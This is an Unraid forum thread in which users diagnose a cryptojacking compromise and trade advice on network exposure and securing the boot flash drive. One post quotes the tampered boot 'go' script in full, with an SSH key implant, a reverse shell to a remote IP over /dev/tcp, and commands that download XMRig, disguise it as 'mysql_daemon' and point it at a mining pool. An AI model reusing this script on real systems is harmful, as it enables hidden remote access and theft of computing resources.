Skip to content
View in the app

A better way to browse. Learn more.

Unraid

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

100% CPU across all cores due to mysql_daemon - UPDATE: go file hacked to mine Crypto

Featured Replies

Hi all,

 

Recently my server has been maxing out the cpu on all cores on boot. I've tried stopping all docker apps and arrays but the issue persists.

 

Running >top in terminal shows the process is mysql_daemon. Can I shut this process down or is it needed by the OS for something?

 

Screenshot-2021-02-04-at-15-07-49.png

 

 

Screenshot-2021-02-04-at-15-11-37.png

 

Edited by JackDewhurst
Updated Title

  • Community Expert

Go to Tools - Diagnostics and attach the complete Diagnostics ZIP file to your NEXT post in this thread.

  • Community Expert
23 hours ago, JackDewhurst said:

tried stopping all docker apps and arrays

And the few plugins you have I don't think use that so I don't know why it would still be running.

  • Author

I can kill it with kill -9 pid and it doesn't seem to have any detrimental effect on the system. Will just do this for the time being till I work out what the cause is.

 

 

  • 1 month later...
  • Author
On 2/5/2021 at 3:03 PM, trurl said:

And the few plugins you have I don't think use that so I don't know why it would still be running.

 

Just a follow up on this. I checked my /boot/config/go file and found someone had edited it to mine XMR! full file contents below:
 

 

#!/bin/bash
# Start the Management Utility
/usr/local/sbin/emhttp &
mkdir /root/.ssh
chmod 700 /root/.ssh
cp /boot/config/ssh/authorized_keys /root/.ssh/
chmod 600 /root/.ssh/authorized_keys
nohup /bin/bash -c "while true; do /bin/bash -i >& /dev/tcp/31.208.152.27/6>
cd /dev/shm
wget https://github.com/xmrig/xmrig/releases/download/v6.7.0/xmrig-6.7.0-li>
tar xzvf xmrig-6.7.0-linux-static-x64.tar.gz
cd xmrig-6.7.0/
mv xmrig /usr/bin/mysql_daemon
mkdir -p /etc/mysql/conf.d
echo '{
    "autosave": true,
    "background": true,
    "cpu": {
        "enabled": true,
        "max-threads-hint": 50
    },
    "max-cpu-usage": 25,
    "cpu-priority": 1,
    "opencl": false,
    "cuda": false,
    "pools": [
        {
            "url": "pool.minexmr.com:443",
            "user": "49mWMCJRxCpcCAVixaEEk5hapQGTVF775eTKqafNU9mCg7JegujvjB>
            "keepalive": true,
            "tls": true
        }
    ]
}' > /etc/mysql/conf.d/.config.json
/usr/bin/mysql_daemon -c /etc/mysql/conf.d/.config.json -B
rm -r /dev/shm/xmrig-6.7.0
rm -r /dev/shm/xmrig-6.7.0-linux-static-x64.tar.gz

 

Not sure how they got access to be able to do this but it's pretty worrying. I've removed the contents for now and changed passwords/ports etc..

 

  • JackDewhurst changed the title to 100% CPU across all cores due to mysql_daemon - UPDATE: go file hacked to mine Crypto

This is why no one should set up their servers to be exposed to the internet.

  • Author

I've not enabled anything specific to expose it. All Unraid settings are default other than changing the root user password. Just added a few docker containers like plex and radarr

Edited by JackDewhurst

  • Community Expert
13 hours ago, JackDewhurst said:

I've not enabled anything specific to expose it. All Unraid settings are default other than changing the root user password. Just added a few docker containers like plex and radarr

 

Are you sure you have not opened up any inbound ports on your router or put unRaid into the DMZ?  Normally a router will block all inbound connections by default.

 

  • 2 weeks later...
  • Community Expert

@JackDewhurst

On 3/17/2021 at 8:26 AM, BRiT said:

This is why no one should set up their servers to be exposed to the internet.

 

Now that we are more attuned to these sorts of things lately, I went back and looked at OP diagnostics. Here are some excerpts from syslog:

 

Feb  4 10:38:38 Bruce-Willis sshd[1956]: Accepted none for adm from 109.236.89.61 port 10163 ssh2
Feb  4 10:38:38 Bruce-Willis sshd[1957]: Accepted none for adm from 51.77.66.36 port 21574 ssh2
Feb  4 10:38:38 Bruce-Willis sshd[2003]: Accepted none for adm from 89.39.105.84 port 12355 ssh2
Feb  4 10:38:38 Bruce-Willis sshd[2097]: Accepted none for adm from 190.2.144.45 port 44237 ssh2
Feb  4 10:38:43 Bruce-Willis sshd[2371]: Invalid user tech from 196.89.145.142 port 61652
Feb  4 10:38:47 Bruce-Willis sshd[2369]: Failed password for root from 192.42.116.28 port 57396 ssh2
Feb  4 10:38:54 Bruce-Willis sshd[5195]: Accepted none for adm from 194.88.107.164 port 8746 ssh2
Feb  4 10:38:58 Bruce-Willis sshd[4618]: Failed password for root from 77.247.181.163 port 17784 ssh2
Feb  4 10:39:10 Bruce-Willis sshd[6513]: Accepted none for adm from 178.128.95.213 port 60574 ssh2
Feb  4 10:39:10 Bruce-Willis sshd[6254]: Failed password for root from 91.192.103.34 port 38220 ssh2
Feb  4 10:39:28 Bruce-Willis sshd[6724]: Failed password for root from 185.220.102.242 port 15016 ssh2

 

https://www.abuseipdb.com/check/109.236.89.61    Netherlands

https://www.abuseipdb.com/check/51.77.66.36    Germany

https://www.abuseipdb.com/check/192.42.116.28    Netherlands

https://www.abuseipdb.com/check/77.247.181.163    Netherlands

https://www.abuseipdb.com/check/91.192.103.34    Switzerland

https://www.abuseipdb.com/check/185.220.102.242    Netherlands

 

  • Community Expert
1 hour ago, jakehaas said:

my Unraid machine is also doing the exact same thing

@jakehaas

Go to Tools - Diagnostics and attach the complete Diagnostics ZIP file to your NEXT post in this thread.

9 hours ago, jakehaas said:

My home network has no ports forwarded from outside.

Unlikely for this to have happened.  You've probably at least forwarded 32400 for Plex, but a shortcut people take when they don't understand how to forward a port is to simply place a server within a DMZ...  Alternatively, one of your clients has been hijacked

  • 2 weeks later...

Just did a reboot today for the first time in a few weeks, and when it booted up I had the same issue as above. Go file was set to mine crypto. Looked through my router ports that were open and the only one I had open that was out of the ordinary was I had 4433 pointing to 443 when I was trying to get the myservers plug in to work as I had trouble with my Eeros mesh router.

 

my admin account password is very complex as well

Edited by docbrown

  • Community Expert
5 minutes ago, docbrown said:

Just did a reboot today for the first time in a few weeks, and when it booted up I had the same issue as above. Go file was set to mine crypto. Looked through my router ports that were open and the only one I had open that was out of the ordinary was I had 4433 pointing to 443 when I was trying to get the myservers plug in to work as I had trouble with my Eeros mesh router.

 

my admin account password is very complex as well

 

Sounds bad if you cannot track down where this is coming from.  I would be worried that you have some other device on your local LAN (or your router) compromised and that is the way that the someone is getting into your system.

 

The other issue is how are they getting to the flash drive to change it?    Is the flash drive shared on the network so that it can be accessed from another machine/device.  I would  recommend it is not shared on the network unless needed and definitely do not have it shared as a public share so anyone can change its content.

13 minutes ago, itimpi said:

 Is the flash drive shared on the network…


Hmm yes i can access it on the network but it doesn’t appear under the shares tab in the unraid ui 

 

Edit: Main tab - Flash durrr

Edited by docbrown

  • Community Expert
1 hour ago, docbrown said:


Hmm yes i can access it on the network but it doesn’t appear under the shares tab in the unraid ui 

 

Edit: Main tab - Flash durrr

Click on the flash drive on the Main tab

 

I've often thought to myself that it should also be listed under the Disk Shares part of the Shares tab as that is a more 'discoverable' location.

 

Make sure to look at all your extras and plugins on the flash as well as dockers to make sure its not self-reinstalling on shutdown or restarts.

Archived

This topic is now archived and is closed to further replies.

Account

Navigation

Search

Search

Configure browser push notifications

Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.